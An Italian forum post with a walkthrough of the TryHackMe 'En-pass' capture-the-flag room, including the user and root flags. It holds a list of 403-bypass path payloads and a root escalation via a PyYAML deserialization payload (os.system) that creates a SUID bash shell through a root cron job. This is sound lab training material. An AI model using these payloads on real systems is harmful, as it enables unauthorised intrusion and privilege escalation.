Descrizione:
Get what you can't.

Link: https://tryhackme.com/room/enpass



  • What is the user flag?

Suggerimento: The path you get will forbid to see but you can bypass it.

La pagina /reg.php:

┌──(user㉿parrot)-[/data/En-pass/files]
└─$ curl -s http://10.10.67.150:8001/reg.php | tr -s '\n'                                                       1 ⨯

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>En-Pass</title>

[REDACTED]

</head>
<body>
<img src="sau.jpg" alt="sau">
<h1>EN-PASS</h1>
<div  id="container">
  <form method="POST" action="/reg.php">
   
    <input type="text" id="title" name="title" placeholder="Input">
   
    <input type="submit" value="Submit">
<h4 style='color:rgb(83, 21, 165);'> <?php
     
if($_SERVER["REQUEST_METHOD"] == "POST"){
   $title = $_POST["title"];
   if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
          
          $val = explode(",",$title);
          $sum = 0;
          
          for($i = 0 ; $i < 9; $i++){
                if ( (strlen($val[0]) == 2) and (strlen($val[8]) ==  3 ))  {
                    if ( $val[5] !=$val[8]  and $val[3]!=$val[7] ) 
            
                        $sum = $sum+ (bool)$val[$i]."<br>"; 
                }
          
          
          }
          if ( ($sum) == 9 ){
            
              echo $result;//do not worry you'll get what you need.
              echo " Congo You Got It !! Nice ";
        
            
            }
            
                    else{
                      echo "  Try Try!!";
                
                    }
          }
        
          else{
            echo "  Try Again!! ";
      
          }     
 
  }
 
?>
</h4>
  </form>
</div>
</body>
</html>

A questo punto, abbiamo la password per la chiave privata SSH, ma non funziona.
Ci resta solo la pagina 403.php:
Proviamo con Burp Suite:

┌──(user㉿parrot)-[/data/src/403fuzzer]
└─$ python3 403fuzzer.py -u http://10.10.67.150:8001/403.php -hc 403,404 --proxy http://localhost:8080

Sending header payloads...

Proxy flag was detected. Skipping trailing dot payload...

Sending URL payloads...
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /#?403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /403.php%3b/%2e.
Response Code: 200  Length: 2563  Payload: /403.php%3b/..
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php/..
Response Code: 200  Length: 2563  Payload: /403.php/../
Response Code: 200  Length: 2563  Payload: /403.php/../../
Response Code: 200  Length: 2563  Payload: /403.php/../../../
Response Code: 200  Length: 2563  Payload: /403.php/../../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//../
Response Code: 200  Length: 2563  Payload: /403.php/.././../
Response Code: 200  Length: 2563  Payload: /403.php/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php/..//
Response Code: 200  Length: 2563  Payload: /403.php/..//../
Response Code: 200  Length: 2563  Payload: /403.php/..//../../
Response Code: 200  Length: 2563  Payload: /403.php/../;/../
Response Code: 200  Length: 917 Payload: /403.php/..;/ <------------------ interesting
Response Code: 200  Length: 917 Payload: /403.php/..;//../
Response Code: 200  Length: 2563  Payload: /403.php//../../
Response Code: 200  Length: 2563  Payload: /403.php;%2f%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;%2f..%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/%2e.
Response Code: 200  Length: 2563  Payload: /403.php;/.%2e
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;/../
Response Code: 200  Length: 2563  Payload: /403.php;/../../
Response Code: 200  Length: 2563  Payload: /403.php;/../..//
Response Code: 200  Length: 2563  Payload: /403.php;/.././../
Response Code: 200  Length: 2563  Payload: /403.php;/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..//
Response Code: 400  Length: 306 Payload: /403.php;/..//%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/..//../
Response Code: 200  Length: 2563  Payload: /403.php;/..///
Response Code: 200  Length: 2563  Payload: /403.php;/../;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;//../../
Response Code: 400  Length: 306 Payload: /;/..//%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response code: 200   Response length: 0           Sent OPTIONS method. 

Response length was 0 so probably NOT worth checking out....

Response Headers: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0

Le richieste con un codice HTTP 200:

GET /403.php/..;/ HTTP/1.1
Host: 10.10.67.150:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

Dove abbiamo:

HTTP/1.1 200 OK
Date: Wed, 12 May 2021 17:07:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 917
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>En-Pass</title>

[REDACTED]

<h3>Glad to see you here.Congo, you bypassed it. 'imsau' is waiting for you somewhere.</h3>
</body>
</html>

Ora abbiamo username e password per accedere:

┌──(user㉿parrot)-[/data/En-pass/files]
└─$ ssh -i key imsau@10.10.67.150
Enter passphrase for key 'key': cimihan_are_you_here?
$ cat user.txt  
1c5ccb6ce6f3561e302e0e516c633da9

USER FLAG: 1c5ccb6ce6f3561e302e0e516c633da9

  • What is the root flag?

L'esecuzione di pspy64 rivelerà un cronjob eseguito da root ogni minuto:

2021/05/12 19:02:01 CMD: UID=0    PID=22837  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22836  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22835  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22834  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22833  | /usr/sbin/CRON -f 
2021/05/12 19:02:01 CMD: UID=0    PID=22832  | /usr/sbin/CRON -f 
2021/05/12 19:02:01 CMD: UID=0    PID=22838  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22839  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:02:05 CMD: UID=0    PID=22840  | ps -e -o pid,ppid,state,command 
2021/05/12 19:03:01 CMD: UID=0    PID=22846  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22845  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22844  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22843  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22842  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22841  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22847  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22848  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:03:07 CMD: UID=0    PID=22849  | ps -e -o pid,ppid,state,command

Il cron job esegue il seguente script Python con sudo e rimuove il file /tmp/file.yml:

imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml


class Execute():
  def __init__(self,file_name ="/tmp/file.yml"):
    self.file_name = file_name
    self.read_file = open(file_name ,"r")

  def run(self):
    return self.read_file.read()

data  = yaml.load(Execute().run())

Non abbiamo accesso in scrittura allo script, ma la ricerca di exploit che interessano la libreria yaml importata porterà a questo problema.

$ cp `which bash` /tmp/bash
$ cat > /tmp/file.yml << EOF
!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]
EOF

Dopo un minuto, abbiamo una shell di root:

imsau@enpass:/tmp$ ./bash -p
bash-4.3# cat /root/root.txt
5d45f08ee939521d59247233d3f8faf

ROOT FLAG: 5d45f08ee939521d59247233d3f8faf

RIASSUMENDO:

Fondatori

Samueleex Giulio_M

 

Powered by: FreeFlarum.
(remove this footer)